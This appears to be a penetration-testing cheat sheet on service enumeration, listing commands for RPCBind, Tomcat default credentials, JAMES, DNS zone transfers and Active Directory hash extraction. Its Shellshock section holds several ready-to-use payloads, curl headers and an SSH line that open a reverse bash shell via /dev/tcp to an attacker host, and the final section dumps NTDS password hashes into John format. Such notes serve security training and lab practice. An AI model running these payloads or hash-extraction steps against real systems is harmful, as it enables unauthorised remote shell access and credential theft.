Other Services Enumeration

RPCBind Port 111

rpcinfo –p x.x.x.x

Apache Tomcat Port 8080

default credentials : tomcat s3cret

Port 4555

JAMES Remote Administration Tool 2.3.2

Shellshock Vulnerability

curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x ip:PORT -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/ip/1234 0>&1" ip/cgi-bin/status
ssh username@IPADDRESS '() { :;}; /bin/bash'
$ python shellshock.py payload=reverse rhost=ip lhost=ip lport=4444 pages=/cgi-bin/user.sh
https://www.exploit-db.com/exploits/34900
bash -i >& /dev/tcp/ip/8888 0>&1

shellshock Vulnerability
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/ip/1234 0>&1 " http://ip:80/cgi-bin/user.sh

Port 53

dnsrecon -r 127.0.0.0/24 -n ip
dig axfr @ip
dig axfr bank.htb @ip

DNS Zone Transfer

nslookup -> set type=any -> ls -d blah.com
dig axfr blah.com @ns1.blah.com
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

Active Directory / LDAP

 ./dsusers.py datatable link_table extract --lmoutfile LM.out --ntoutfile NT.out --passwordhashes --pwdformat john -- syshive 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

 /usr/local/bin/esedbexport -m tables 20170721114636_default_192.x.x.x 33_psexec.ntdsgrab._333512.dit

Last updated